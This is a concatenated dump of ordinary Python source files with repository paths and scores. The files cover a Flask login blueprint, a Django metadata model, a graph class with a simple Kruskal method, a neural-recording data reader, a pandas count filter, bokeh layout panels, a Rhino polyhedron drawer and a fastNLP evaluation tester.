self.assertRaises(ValidationError, cn.clean) | 0.624523 | 0.283918 |
from flask import render_template, request, redirect, session, Blueprint
import uuid
from crud import client
from crud import producer
app = Blueprint("login", "app")
@app.route('/', methods=['GET', 'POST'])
def index():
if "cpf" in session:
return redirect("/main")
elif "cnpj" in session:
return render_template("main_producer.html")
else:
return render_template("index.html")
@app.route('/access', methods=['GET', 'POST'])
def access():
if request.method == 'POST':
if request.form['index'] == "Login":
try:
CPF = request.form['CPF']
password = request.form['password']
login_approve = client.read(CPF, password)
                session_cpf = None
                session_id = None
                for rows in login_approve:
                    session_cpf = rows[1]
                    session_id = rows[0]
                if session_cpf is not None:
session['cpf'] = session_cpf
session['uuid'] = str(uuid.uuid4())
session['id'] = session_id
else:
print("Don't have credentials")
return redirect("/main")
except Exception as e:
return render_template("index_denied.html")
elif request.form['index'] == "Registrar":
return render_template("register.html")
else:
return render_template("producer_login.html")
@app.route('/access_producer', methods=['GET', 'POST'])
def access_producer():
if request.method == 'POST':
if request.form['index'] == "Login":
try:
CNPJ = request.form['CNPJ']
password = request.form['password']
login_approve = producer.read(CNPJ, password)
                session_cnpj = None
                session_id = None
                for rows in login_approve:
                    session_cnpj = rows[1]
                    session_id = rows[0]
                if session_cnpj is not None:
session['cnpj'] = session_cnpj
session['id'] = session_id
else:
print("Don't have credentials")
return render_template("main_producer.html")
except Exception as e:
return render_template("producer_login_denied.html")
else:
return render_template("register_producer.html")
@app.route('/logout')
def logout():
session.pop('cpf', None)
session.pop('cnpj', None)
session.pop('id', None)
session.pop('uuid', None)
    return redirect("/", code=302) | api/login.py | 0.249082 | 0.052207 |
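# Usage sketch for the api/login.py blueprint above: one way it could be mounted on a
# Flask application. The app factory, the secret key value and the import path are
# illustrative assumptions; only Blueprint("login", "app") and the session handling
# come from the module itself.
from flask import Flask
from api.login import app as login_blueprint  # import path assumed from the repo path above

def create_app():
    flask_app = Flask(__name__)
    flask_app.secret_key = "replace-with-a-real-secret"  # session['cpf'] / session['cnpj'] need a secret key
    flask_app.register_blueprint(login_blueprint)
    return flask_app

if __name__ == "__main__":
    create_app().run(debug=True)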
from django.db import models, transaction
from django.contrib.contenttypes.fields import GenericRelation
from django.core.exceptions import ValidationError
from mezzanine.pages.page_processors import processor_for
from hs_core.models import BaseResource, ResourceManager, resource_processor, CoreMetaData, \
AbstractMetaDataElement
# TODO Deprecated
class ScriptResource(BaseResource):
objects = ResourceManager('ScriptResource')
discovery_content_type = 'Script' # used during discovery
class Meta:
proxy = True
verbose_name = 'Script Resource'
@classmethod
def get_supported_upload_file_types(cls):
# one file type is supported
return ".r", ".py", ".m"
@classmethod
def get_metadata_class(cls):
return ScriptMetaData
processor_for(ScriptResource)(resource_processor)
class ScriptSpecificMetadata(AbstractMetaDataElement):
term = "ScriptSpecificMetadata"
# program language
scriptLanguage = models.CharField(verbose_name='Programming Language', blank=True, max_length=100, default='R',
help_text='The programming language that the script is written in')
# language version
languageVersion = models.CharField(verbose_name='Programming Language Version', blank=True, max_length=255,
help_text='The software version of the script')
# script version
scriptVersion = models.CharField(verbose_name='Script Version', max_length=255, blank=True, default='1.0',
help_text='The software version or build number of the script')
# dependencies
scriptDependencies = models.CharField(verbose_name='Dependencies', blank=True, max_length=400,
help_text='Dependencies for the script (externally-imported packages)')
# release date
scriptReleaseDate = models.DateTimeField(verbose_name='Release Date', null=True, blank=True,
help_text='The date that this version of the script was released')
# repository
scriptCodeRepository = models.URLField(verbose_name='Script Repository', blank=True, max_length=255,
help_text='A URL to the source code repository (e.g. git, mercurial, svn)')
class Meta:
# ScriptSpecificMetadata element is not repeatable
unique_together = ("content_type", "object_id")
class ScriptMetaData(CoreMetaData):
scriptspecificmetadata = GenericRelation(ScriptSpecificMetadata)
@property
def resource(self):
return ScriptResource.objects.filter(object_id=self.id).first()
@property
def program(self):
return self.scriptspecificmetadata.all().first()
@property
def script_specific_metadata(self):
return self.program
@property
def serializer(self):
"""Return an instance of rest_framework Serializer for self """
from .serializers import ScriptMetaDataSerializer
return ScriptMetaDataSerializer(self)
@classmethod
def parse_for_bulk_update(cls, metadata, parsed_metadata):
"""Overriding the base class method"""
CoreMetaData.parse_for_bulk_update(metadata, parsed_metadata)
keys_to_update = list(metadata.keys())
if 'scriptspecificmetadata' in keys_to_update:
parsed_metadata.append({"scriptspecificmetadata":
metadata.pop('scriptspecificmetadata')})
@classmethod
def get_supported_element_names(cls):
elements = super(ScriptMetaData, cls).get_supported_element_names()
elements.append('ScriptSpecificMetadata')
return elements
def has_all_required_elements(self):
if self.get_required_missing_elements():
return False
return True
def get_required_missing_elements(self): # show missing required meta
missing_required_elements = super(ScriptMetaData, self).get_required_missing_elements()
if not self.program:
missing_required_elements.append('Script Language')
missing_required_elements.append('Programming Language Version')
else:
if not self.program.scriptLanguage:
missing_required_elements.append('Script Language')
if not self.program.languageVersion:
missing_required_elements.append('Programming Language Version')
return missing_required_elements
def update(self, metadata, user):
# overriding the base class update method for bulk update of metadata
from .forms import ScriptFormValidation
super(ScriptMetaData, self).update(metadata, user)
attribute_mappings = {'scriptspecificmetadata': 'program'}
with transaction.atomic():
# update/create non-repeatable element
for element_name in list(attribute_mappings.keys()):
for dict_item in metadata:
if element_name in dict_item:
validation_form = ScriptFormValidation(dict_item[element_name])
if not validation_form.is_valid():
err_string = self.get_form_errors_as_string(validation_form)
raise ValidationError(err_string)
element_property_name = attribute_mappings[element_name]
self.update_non_repeatable_element(element_name, metadata,
element_property_name)
break
from . import receivers # never delete this otherwise none of the receiver function will work | hs_script_resource/models.py | 0.495606 | 0.057705 |
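# Illustrative payload shape for ScriptMetaData.update() above: a list of single-key dicts
# whose 'scriptspecificmetadata' entry is validated by ScriptFormValidation and stored as the
# non-repeatable ScriptSpecificMetadata element. The field values, the resource and the user
# below are assumptions for the example, not taken from the project.
metadata_payload = [
    {"scriptspecificmetadata": {
        "scriptLanguage": "Python",
        "languageVersion": "3.10",
        "scriptVersion": "1.2",
        "scriptDependencies": "numpy, pandas",
        "scriptCodeRepository": "https://github.com/example/my-script",
    }},
]
# Inside a view that has a real resource and request.user:
# resource.metadata.update(metadata_payload, request.user)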
class VerticeInvalidoException(Exception):
pass
class ArestaInvalidaException(Exception):
pass
class MatrizInvalidaException(Exception):
pass
class Grafo:
QTDE_MAX_SEPARADOR = 1
SEPARADOR_ARESTA = '-'
__maior_vertice = 0
def __init__(self, V=None, M=None):
'''
        Constructs a Grafo object. If no parameter is passed, an empty Grafo is created.
        If any edge or vertex is invalid, an exception is raised.
        :param V: A list of the graph's vertices (or nodes).
        :param M: An adjacency matrix that stores the graph's edges. Each matrix entry holds an integer indicating how many edges connect those two vertices.
'''
if V == None:
V = list()
if M == None:
M = list()
for v in V:
if not (Grafo.verticeValido(v)):
raise VerticeInvalidoException('O vértice ' + v + ' é inválido')
if len(v) > self.__maior_vertice:
self.__maior_vertice = len(v)
self.N = list(V)
self.pesos = {}
if M == []:
for k in range(len(V)):
M.append(list())
for l in range(len(V)):
if k > l:
M[k].append('-')
else:
M[k].append(0)
if len(M) != len(V):
raise MatrizInvalidaException('A matriz passada como parâmetro não tem o tamanho correto')
for c in M:
if len(c) != len(V):
raise MatrizInvalidaException('A matriz passada como parâmetro não tem o tamanho correto')
for i in range(len(V)):
for j in range(len(V)):
'''
                Checks whether the indices passed as parameters refer to an element of the matrix below the main diagonal.
                It also checks whether that element is a dash "-", which indicates that the matrix is undirected and was built correctly.
'''
if i > j and not (M[i][j] == '-'):
raise MatrizInvalidaException('A matriz não representa uma matriz não direcionada')
aresta = V[i] + Grafo.SEPARADOR_ARESTA + V[j]
if not (self.arestaValida(aresta)):
raise ArestaInvalidaException('A aresta ' + aresta + ' é inválida')
self.M = list(M)
def arestaValida(self, aresta=''):
'''
        Checks whether an edge passed as a parameter follows the established format.
        An edge is represented by a string in the format a-b, where:
        a is a substring of the edge holding the name of one vertex adjacent to the edge.
        - is a separator character. An edge may contain only one such character.
        b is a substring of the edge holding the name of the other vertex adjacent to the edge.
        In addition, an edge is only valid if it connects two vertices that exist in the graph.
        :param aresta: The edge whose format is to be checked.
        :return: A boolean value indicating whether the edge is in the correct format.
'''
        # There cannot be more than one separator character
if aresta.count(Grafo.SEPARADOR_ARESTA) != Grafo.QTDE_MAX_SEPARADOR:
return False
        # Index of the separator element
i_traco = aresta.index(Grafo.SEPARADOR_ARESTA)
        # The separator character cannot be the first or the last character of the edge
if i_traco == 0 or aresta[-1] == Grafo.SEPARADOR_ARESTA:
return False
if not (self.existeVertice(aresta[:i_traco])) or not (self.existeVertice(aresta[i_traco + 1:])):
return False
return True
@classmethod
def verticeValido(self, vertice: str):
'''
        Checks whether a vertex passed as a parameter follows the established format.
        A vertex is any non-empty string that does not contain the separator character.
        :param vertice: A string representing the vertex to be analyzed.
        :return: A boolean value indicating whether the vertex is in the correct format.
'''
return vertice != '' and vertice.count(Grafo.SEPARADOR_ARESTA) == 0
def existeVertice(self, vertice: str):
'''
        Checks whether a vertex passed as a parameter belongs to the graph.
        :param vertice: The vertex to be checked.
        :return: A boolean value indicating whether the vertex exists in the graph.
'''
return Grafo.verticeValido(vertice) and self.N.count(vertice) > 0
def __primeiro_vertice_aresta(self, a: str):
'''
        Given an edge in the format X-Y, returns the vertex X
        :param a: the edge to be analyzed
        :return: The first vertex of the edge
'''
return a[0:a.index(Grafo.SEPARADOR_ARESTA)]
def __segundo_vertice_aresta(self, a: str):
'''
        Given an edge in the format X-Y, returns the vertex Y
        :param a: The edge to be analyzed
        :return: The second vertex of the edge
'''
return a[a.index(Grafo.SEPARADOR_ARESTA) + 1:]
def __indice_primeiro_vertice_aresta(self, a: str):
'''
        Given an edge in the format X-Y, returns the index of vertex X in the vertex list
        :param a: The edge to be analyzed
        :return: The index of the first vertex of the edge in the vertex list
'''
return self.N.index(self.__primeiro_vertice_aresta(a))
def __indice_segundo_vertice_aresta(self, a: str):
'''
        Given an edge in the format X-Y, returns the index of vertex Y in the vertex list
        :param a: The edge to be analyzed
        :return: The index of the second vertex of the edge in the vertex list
'''
return self.N.index(self.__segundo_vertice_aresta(a))
def existeAresta(self, a: str):
'''
        Checks whether an edge passed as a parameter belongs to the graph.
        :param aresta: The edge to be checked
        :return: A boolean value indicating whether the edge exists in the graph.
'''
        existe = False
        if Grafo.arestaValida(self, a):
            # the adjacency check does not depend on the loop indices, so no loop over M is needed
            if self.M[self.__indice_primeiro_vertice_aresta(a)][self.__indice_segundo_vertice_aresta(a)]:
                existe = True
        return existe
def adicionaVertice(self, v):
'''
        Adds a vertex to the graph if it is in the correct format.
        :param v: The vertex to be added to the graph.
        :raises VerticeInvalidoException if the vertex already exists or is not in a valid format.
'''
if v in self.N:
raise VerticeInvalidoException('O vértice {} já existe'.format(v))
if self.verticeValido(v):
if len(v) > self.__maior_vertice:
self.__maior_vertice = len(v)
            self.N.append(v) # Adds the vertex to the vertex list
            self.M.append([]) # Adds the row
            for k in range(len(self.N)):
                if k != len(self.N) - 1:
                    self.M[k].append(0) # adds the elements of the vertex's column
                    self.M[self.N.index(v)].append('-') # adds the elements of the vertex's row
                else:
                    self.M[self.N.index(v)].append(0) # adds a zero as the last element of the row
else:
raise VerticeInvalidoException('O vértice ' + v + ' é inválido')
def adicionaAresta(self, a, peso):
'''
        Adds an edge to the graph in the format X-Y, where X is the first vertex and Y is the second vertex
        :param a: the edge in the correct format
        :raise: raises an exception if the edge is not in a valid format
'''
if self.arestaValida(a):
i_a1 = self.__indice_primeiro_vertice_aresta(a)
i_a2 = self.__indice_segundo_vertice_aresta(a)
if i_a1 < i_a2:
self.M[i_a1][i_a2] += 1
else:
self.M[i_a2][i_a1] += 1
else:
raise ArestaInvalidaException('A aresta {} é inválida'.format(a))
self.pesos[a] = peso
def remove_aresta(self, a):
'''
        Removes an edge from the graph in the format X-Y, where X is the first vertex and Y is the second vertex
        :param a: the edge in the correct format
        :raise: raises an exception if the edge is not in a valid format
'''
if self.arestaValida(a):
if self.existeAresta(a):
i_a1 = self.__indice_primeiro_vertice_aresta(a)
i_a2 = self.__indice_segundo_vertice_aresta(a)
if i_a1 < i_a2:
self.M[i_a1][i_a2] -= 1
else:
self.M[i_a2][i_a1] -= 1
else:
raise ArestaInvalidaException('A aresta {} é inválida'.format(a))
def vertices_nao_adjacentes(self):
not_adj = []
for i in range(len(self.N)):
for j in range(len(self.N)):
if self.M[i][j] == 0:
aresta = self.N[i] + "-" + self.N[j]
not_adj.append(aresta)
return not_adj
def ha_laco(self):
for i in range(len(self.M)):
if self.M[i][i] > 0:
return True
return False
def ha_paralelas(self):
for i in range(len(self.M)):
for j in range(len(self.M)):
if self.M[i][j] != '-' and self.M[i][j] > 1:
return True
return False
def arestas_sobre_vertice(self, vertice):
sobre_vertice = []
'''for i in range(len(self.N)):
for j in range(len(self.N)):
if self.N[i] == vertice and self.M[i][j] != '-'and i != j and self.M[i][j] > 0:
aresta = vertice+"-"+self.N[j]
sobre_vertice.append(aresta)
if self.N[j] == vertice and self.M[i][j] != '-' and i != j and self.M[i][j] > 0:
aresta = vertice+'-'+self.N[i]
sobre_vertice.append(aresta)
elif self.N[i] == vertice and self.M[i][j] != '-' and i == j and self.M[i][j] > 0:
aresta = vertice + '-' + self.N[i]
sobre_vertice.append(aresta)'''
index = 0
for i in range(len(self.N)):
if self.N[i] == vertice:
index = i
for i in range(len(self.N)):
if self.M[index][i] != '-' and self.M[index][i] > 0:
for j in range(self.M[index][i]):
aresta = vertice + "-" + self.N[i]
sobre_vertice.append(aresta)
if self.M[i][index] != '-' and self.M[i][index] > 0:
for j in range(self.M[i][index]):
aresta = vertice + "-" + self.N[i]
sobre_vertice.append(aresta)
return sobre_vertice
def eh_completo(self):
completo = True
for i in range(len(self.M)):
for j in range(len(self.M)):
if self.M[i][j] != '-' and self.M[i][j] >= 1 and i != j:
completo = True
elif self.M[i][j] != '-' and self.M[i][j] == 0 and i != j:
return False
return completo
def grau(self, vertice):
index = 1
soma = 0
soma_diagonal = 0
for i in range(len(self.N)):
for j in range(len(self.N)):
if self.N[i] == vertice or self.N[j] == vertice and i != j:
if self.M[i][j] != "-":
soma += self.M[i][j]
return soma
def Kruskal(self):
vertice_permanente = []
arvore = []
pesos = []
for i in self.pesos:
pesos.append(self.pesos[i])
c = 0
pesos.sort()
while len(pesos) != 0:
minimo = min(pesos)
for i in self.pesos:
if self.pesos[i] == minimo and i[0] not in vertice_permanente:
vertice_permanente.append(i[0])
arvore.append(i)
while minimo in pesos:
pesos.remove(minimo)
c += 1
return arvore
def __str__(self):
'''
        Provides a string representation of the graph.
        The string contains a sequence of the vertices separated by commas, followed by a sequence of the edges in the standard format.
        :return: A string representing the graph
'''
        # Gives the correct spacing according to the length of the longest vertex name
espaco = ' ' * (self.__maior_vertice)
grafo_str = espaco + ' '
for v in range(len(self.N)):
grafo_str += self.N[v]
            if v < (len(self.N) - 1): # Only add the space if this is not the last vertex
grafo_str += ' '
grafo_str += '\n'
for l in range(len(self.M)):
grafo_str += self.N[l] + ' '
for c in range(len(self.M)):
grafo_str += str(self.M[l][c]) + ' '
grafo_str += '\n'
        return grafo_str | Graphs/Kruskal algorithm/grafo_adj_nao_dir.py | 0.434221 | 0.441553 |
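# Usage sketch for the Grafo class above: build a small weighted, undirected graph and run
# the simplified Kruskal method. The vertex names and weights are made up for the example;
# note that this Kruskal variant only tracks the first vertex of each chosen edge instead of
# using a full union-find structure.
g = Grafo(['A', 'B', 'C', 'D'])
g.adicionaAresta('A-B', 1)
g.adicionaAresta('B-C', 2)
g.adicionaAresta('C-D', 3)
g.adicionaAresta('A-D', 4)
print(g)            # adjacency matrix labelled with the vertex names
print(g.Kruskal())  # ['A-B', 'B-C', 'C-D'] for these weights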
import sys, struct
import numpy as np
def read_one_data_block(data, header, indices, fid):
"""Reads one 60-sample data block from fid into data, at the location indicated by indices."""
# In version 1.2, we moved from saving timestamps as unsigned
# integers to signed integers to accommodate negative (adjusted)
    # timestamps for pretrigger data.
if (header['version']['major'] == 1 and header['version']['minor'] >= 2) or (header['version']['major'] > 1):
data['t_amplifier'][indices['amplifier']:(indices['amplifier']+60)] = np.array(struct.unpack('<' + 'i' *60, fid.read(240)))
else:
data['t_amplifier'][indices['amplifier']:(indices['amplifier']+60)] = np.array(struct.unpack('<' + 'I' *60, fid.read(240)))
if header['num_amplifier_channels'] > 0:
tmp = np.fromfile(fid, dtype='uint16', count=60 * header['num_amplifier_channels'])
data['amplifier_data'][range(header['num_amplifier_channels']), indices['amplifier']:(indices['amplifier']+60)] = tmp.reshape(header['num_amplifier_channels'], 60)
if header['num_aux_input_channels'] > 0:
tmp = np.fromfile(fid, dtype='uint16', count=15 * header['num_aux_input_channels'])
data['aux_input_data'][range(header['num_aux_input_channels']), indices['aux_input']:(indices['aux_input']+15)] = tmp.reshape(header['num_aux_input_channels'], 15)
if header['num_supply_voltage_channels'] > 0:
tmp = np.fromfile(fid, dtype='uint16', count=1 * header['num_supply_voltage_channels'])
data['supply_voltage_data'][range(header['num_supply_voltage_channels']), indices['supply_voltage']:(indices['supply_voltage']+1)] = tmp.reshape(header['num_supply_voltage_channels'], 1)
if header['num_temp_sensor_channels'] > 0:
tmp = np.fromfile(fid, dtype='uint16', count=1 * header['num_temp_sensor_channels'])
data['temp_sensor_data'][range(header['num_temp_sensor_channels']), indices['supply_voltage']:(indices['supply_voltage']+1)] = tmp.reshape(header['num_temp_sensor_channels'], 1)
if header['num_board_adc_channels'] > 0:
tmp = np.fromfile(fid, dtype='uint16', count=60 * header['num_board_adc_channels'])
data['board_adc_data'][range(header['num_board_adc_channels']), indices['board_adc']:(indices['board_adc']+60)] = tmp.reshape(header['num_board_adc_channels'], 60)
if header['num_board_dig_in_channels'] > 0:
data['board_dig_in_raw'][indices['board_dig_in']:(indices['board_dig_in']+60)] = np.array(struct.unpack('<' + 'H' *60, fid.read(120)))
if header['num_board_dig_out_channels'] > 0:
        data['board_dig_out_raw'][indices['board_dig_out']:(indices['board_dig_out']+60)] = np.array(struct.unpack('<' + 'H' *60, fid.read(120))) | pyspike/intanutil/read_one_data_block.py | 0.385837 | 0.29146 |
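# Minimal, self-contained sketch of calling read_one_data_block() above. In real use the header
# dict comes from the package's RHD header reader; here a synthetic header with zero optional
# channels and one fake 60-sample timestamp block are used only to show the expected shapes of
# the data / header / indices arguments.
import io
import struct
import numpy as np

header = {'version': {'major': 1, 'minor': 5},
          'num_amplifier_channels': 0, 'num_aux_input_channels': 0,
          'num_supply_voltage_channels': 0, 'num_temp_sensor_channels': 0,
          'num_board_adc_channels': 0, 'num_board_dig_in_channels': 0,
          'num_board_dig_out_channels': 0}
data = {'t_amplifier': np.zeros(60, dtype=np.int64)}
indices = {'amplifier': 0, 'aux_input': 0, 'supply_voltage': 0,
           'board_adc': 0, 'board_dig_in': 0, 'board_dig_out': 0}
fid = io.BytesIO(struct.pack('<60i', *range(60)))  # one block of signed 32-bit timestamps
read_one_data_block(data, header, indices, fid)
print(data['t_amplifier'][:5])  # [0 1 2 3 4]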
import pandas as pd
def exclude_the_min_row_sum(feature_count_table,
feature_count_start_column, feature_count_end_column, min_row, output_file):
feature_count_table_df = pd.read_table(feature_count_table)
matrix_value = _extract_value_matrix(feature_count_table_df,
feature_count_start_column, feature_count_end_column)
colum_with_gene_name = _extract_gene_matrix(feature_count_table_df)
attribute_matrix = _extract_attributes(feature_count_table_df, feature_count_start_column)
min_row_sum(matrix_value, attribute_matrix, colum_with_gene_name, min_row, output_file)
def _extract_value_matrix(feature_count_table_df, feature_count_start_column,
feature_count_end_column):
return feature_count_table_df.iloc[:, feature_count_start_column:(
feature_count_end_column)]
def _extract_gene_matrix(feature_count_table_df):
gene_column = feature_count_table_df[list(filter(
lambda col: col.startswith("Attributes"), feature_count_table_df.columns))]
return gene_column
def _extract_attributes(feature_count_table_df,
feature_count_start_column):
return feature_count_table_df.iloc[:, : feature_count_start_column]
def min_row_sum(value_matrix, attribute_matrix, gene_column, min_row, output_file):
gene_table_final = []
combined_df_ext = pd.concat([attribute_matrix, value_matrix], axis=1)
summed_values = value_matrix.sum(axis=1)
combined_df = pd.concat([gene_column, summed_values], axis=1)
combined_df.columns = ['Attributes', 'sum_of_values']
selected_df = combined_df[~(combined_df['sum_of_values'] <= min_row)]
selected_df.reset_index(drop=True, inplace=True)
my_keys = selected_df['Attributes'].tolist()
for index, row in combined_df_ext.iterrows():
gene = row["Attributes"]
if gene in my_keys:
gene_table_final.append(row)
df_with_min_row_samples = pd.DataFrame(gene_table_final)
df_with_min_row_samples.reset_index(drop=True, inplace=True)
    df_with_min_row_samples.to_csv(output_file, sep='\t', index=0) | graditudelib/min_row_sum.py | 0.371935 | 0.338842 |
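# Usage sketch for exclude_the_min_row_sum() above with a tiny tab-separated counts table.
# The file names, column layout and threshold are illustrative assumptions: column 0 holds the
# "Attributes" identifiers and columns 1..2 hold library counts, so the value matrix runs from
# start column 1 to end column 3.
import pandas as pd

pd.DataFrame({
    "Attributes": ["geneA", "geneB", "geneC"],
    "lib_1": [0, 10, 3],
    "lib_2": [1, 20, 4],
}).to_csv("counts.tsv", sep="\t", index=False)

exclude_the_min_row_sum("counts.tsv", 1, 3, 5, "filtered.tsv")
print(pd.read_table("filtered.tsv"))  # keeps geneB (sum 30) and geneC (sum 7); drops geneA (sum 1)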
import abc
from bokeh.document import Document
from bokeh.io import export_png, export_svgs
from bokeh.layouts import column, gridplot, row
from bokeh.models import Spacer
class BasePanel(object):
""" Base class for all panels. """
def __init__(self):
self.layout = None
self.doc = None
self.handlers = None
self.glyph_map = None
self.figure_map = None
self.figures = None
# TODO: improve
self.added_figures = []
self.added_overlays = []
self.added_overlay_figures = []
self.added_annotations = []
self.added_annotation_figures = []
self.modifiers = []
@abc.abstractmethod
def make_layout(self):
""" Make the layout. """
@abc.abstractmethod
def show(self, *args, **kwargs):
""" Show the layout. """
def _export(self, func, backend, filename):
""" Export. """
backends = []
for f in self.figures:
if hasattr(f, "output_backend"):
backends.append(f.output_backend)
f.output_backend = backend
func(self.layout, filename=filename)
for f in self.figures:
if hasattr(f, "output_backend"):
f.output_backend = backends.pop(0)
def export(self, filename, mode="auto"):
""" Export the layout as as png or svg file.
Parameters
----------
filename : str
The path of the exported file.
mode : 'auto', 'png' or 'svg', default 'auto'
Whether to export as png or svg. Note that multi-figure layouts
will be split into individual files for each figure in the svg
mode. 'auto' will try to determine the mode automatically from
the file extension.
"""
if self.layout is None:
self.make_layout()
if mode == "auto":
mode = filename.split(".")[-1]
if mode not in ("png", "svg"):
raise ValueError(
"Could not determine mode from file extension"
)
if mode == "png":
# TODO: TEST
for c in self.layout.children:
if hasattr(c, "toolbar_location"):
c.toolbar_location = None
self._export(export_png, "canvas", filename)
# TODO: TEST
for c in self.layout.children:
if hasattr(c, "toolbar_location"):
c.toolbar_location = self.toolbar_location
elif mode == "svg":
self._export(export_svgs, "svg", filename)
else:
raise ValueError("Unrecognized mode")
def make_doc(self):
""" Make the document. """
self.doc = Document()
self.doc.theme = self.theme
self.doc.add_root(row(self.layout))
def copy(self, with_data=False):
""" Create a copy of this instance.
Parameters
----------
with_data : bool, default False
If true, also copy the data.
Returns
-------
new : xrview.core.panel.BasePanel
The copied object.
"""
from copy import copy
new = self.__new__(type(self))
new.__dict__ = {
k: (copy(v) if (k != "data" or with_data) else v)
for k, v in self.__dict__.items()
}
return new
class GridPlot(BasePanel):
""" Base class for grid plots. """
def __init__(self, panels, ncols=1, toolbar_location="above"):
""" Constructor. """
self.panels = panels
self.ncols = ncols
self.toolbar_location = toolbar_location
self.make_layout()
def make_layout(self):
""" Make the layout. """
self.figures = []
for p in self.panels:
if p.layout is None:
p.make_layout()
# TODO: TEST
for c in p.layout.children:
if hasattr(c, "toolbar_location"):
c.toolbar_location = None
self.figures += p.figures
self.layout = gridplot(
[p.layout for p in self.panels],
ncols=self.ncols,
toolbar_location=self.toolbar_location,
)
return self.layout
class SpacerPanel(BasePanel):
""" Base class for spacers. """
def __init__(self):
""" Constructor. """
self.figures = [Spacer()]
self.make_layout()
def make_layout(self):
""" Make the layout. """
self.layout = column(*self.figures)
        return self.layout | xrview/core/panel.py | 0.457137 | 0.291397 |
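# Minimal sketch using only the classes defined in xrview/core/panel.py above: two spacer panels
# arranged side by side. Real applications would pass concrete plotting panels from the rest of
# xrview, and exporting to png/svg additionally needs selenium with a headless browser; this only
# shows how GridPlot composes the panels' bokeh layouts.
grid = GridPlot([SpacerPanel(), SpacerPanel()], ncols=2)
layout = grid.make_layout()  # a bokeh gridplot built from each panel's column layout
# from bokeh.io import show
# show(layout)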
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import compas_rhino
from ._shapeartist import ShapeArtist
class PolyhedronArtist(ShapeArtist):
"""Artist for drawing polyhedron shapes.
Parameters
----------
shape : :class:`compas.geometry.Polyhedron`
A COMPAS polyhedron.
Notes
-----
See :class:`compas_rhino.artists.ShapeArtist` for all other parameters.
Examples
--------
.. code-block:: python
import random
from compas.geometry import Pointcloud
from compas.geometry import Polyhedron
from compas.geometry import Translation
from compas.utilities import i_to_rgb
import compas_rhino
from compas_rhino.artists import PolyhedronArtist
pcl = Pointcloud.from_bounds(10, 10, 10, 100)
tpl = Polyhedron.from_platonicsolid(12)
compas_rhino.clear_layer("Test::PolyhedronArtist")
for point in pcl.points:
polyhedron = tpl.transformed(Translation.from_vector(point))
artist = PolyhedronArtist(polyhedron, color=i_to_rgb(random.random()), layer="Test::PolyhedronArtist")
artist.draw()
"""
def draw(self, show_vertices=False, show_edges=False, show_faces=True, join_faces=True):
"""Draw the polyhedron associated with the artist.
Parameters
----------
show_vertices : bool, optional
Default is ``False``.
show_edges : bool, optional
Default is ``False``.
show_faces : bool, optional
Default is ``True``.
join_faces : bool, optional
Default is ``True``.
Returns
-------
list
The GUIDs of the objects created in Rhino.
"""
vertices = [list(vertex) for vertex in self.shape.vertices]
guids = []
if show_vertices:
points = [{'pos': point, 'color': self.color, 'name': str(index)} for index, point in enumerate(vertices)]
guids += compas_rhino.draw_points(points, layer=self.layer, clear=False, redraw=False)
if show_edges:
edges = self.shape.edges
lines = [{'start': vertices[i], 'end': vertices[j], 'color': self.color} for i, j in edges]
guids += compas_rhino.draw_lines(lines, layer=self.layer, clear=False, redraw=False)
if show_faces:
faces = self.shape.faces
if join_faces:
guid = compas_rhino.draw_mesh(vertices, faces, layer=self.layer, name=self.name, color=self.color, disjoint=True)
guids.append(guid)
else:
polygons = [{'points': [vertices[index] for index in face], 'color': self.color} for face in faces]
guids += compas_rhino.draw_faces(polygons, layer=self.layer, clear=False, redraw=False)
self._guids = guids
return guids
# ==============================================================================
# Main
# ==============================================================================
if __name__ == '__main__':
    pass | src/compas_rhino/artists/polyhedronartist.py | 0.898711 | 0.38549 |
import torch
from torch import nn
from fastNLP.core.batch import Batch
from fastNLP.core.dataset import DataSet
from fastNLP.core.metrics import _prepare_metrics
from fastNLP.core.sampler import SequentialSampler
from fastNLP.core.utils import CheckError
from fastNLP.core.utils import _build_args
from fastNLP.core.utils import _check_loss_evaluate
from fastNLP.core.utils import _move_dict_value_to_device
from fastNLP.core.utils import get_func_signature
class Tester(object):
"""An collection of model inference and evaluation of performance, used over validation/dev set and test set.
:param DataSet data: a validation/development set
:param torch.nn.modules.module model: a PyTorch model
:param MetricBase metrics: a metric object or a list of metrics (List[MetricBase])
:param int batch_size: batch size for validation
:param bool use_cuda: whether to use CUDA in validation.
    :param int verbose: verbosity level; if it is at least 1, the evaluation results are printed.
"""
def __init__(self, data, model, metrics, batch_size=16, use_cuda=False, verbose=1):
super(Tester, self).__init__()
if not isinstance(data, DataSet):
raise TypeError(f"The type of data must be `fastNLP.DataSet`, got `{type(data)}`.")
if not isinstance(model, nn.Module):
raise TypeError(f"The type of model must be `torch.nn.Module`, got `{type(model)}`.")
self.metrics = _prepare_metrics(metrics)
self.data = data
self.use_cuda = use_cuda
self.batch_size = batch_size
self.verbose = verbose
if torch.cuda.is_available() and self.use_cuda:
self._model = model.cuda()
else:
self._model = model
self._model_device = model.parameters().__next__().device
# check predict
if hasattr(self._model, 'predict'):
self._predict_func = self._model.predict
if not callable(self._predict_func):
_model_name = model.__class__.__name__
raise TypeError(f"`{_model_name}.predict` must be callable to be used "
f"for evaluation, not `{type(self._predict_func)}`.")
else:
self._predict_func = self._model.forward
def test(self):
"""Start test or validation.
        :return eval_results: a dictionary whose keys are the class names of the metrics and whose values are their evaluation results.
"""
# turn on the testing mode; clean up the history
network = self._model
self._mode(network, is_test=True)
data_iterator = Batch(self.data, self.batch_size, sampler=SequentialSampler(), as_numpy=False)
eval_results = {}
try:
with torch.no_grad():
for batch_x, batch_y in data_iterator:
_move_dict_value_to_device(batch_x, batch_y, device=self._model_device)
pred_dict = self._data_forward(self._predict_func, batch_x)
if not isinstance(pred_dict, dict):
raise TypeError(f"The return value of {get_func_signature(self._predict_func)} "
f"must be `dict`, got {type(pred_dict)}.")
for metric in self.metrics:
metric(pred_dict, batch_y)
for metric in self.metrics:
eval_result = metric.get_metric()
if not isinstance(eval_result, dict):
raise TypeError(f"The return value of {get_func_signature(metric.get_metric)} must be "
f"`dict`, got {type(eval_result)}")
metric_name = metric.__class__.__name__
eval_results[metric_name] = eval_result
except CheckError as e:
prev_func_signature = get_func_signature(self._predict_func)
_check_loss_evaluate(prev_func_signature=prev_func_signature, func_signature=e.func_signature,
check_res=e.check_res, pred_dict=pred_dict, target_dict=batch_y,
dataset=self.data, check_level=0)
if self.verbose >= 1:
print("[tester] \n{}".format(self._format_eval_results(eval_results)))
self._mode(network, is_test=False)
return eval_results
def _mode(self, model, is_test=False):
"""Train mode or Test mode. This is for PyTorch currently.
:param model: a PyTorch model
:param is_test: bool, whether in test mode or not.
"""
if is_test:
model.eval()
else:
model.train()
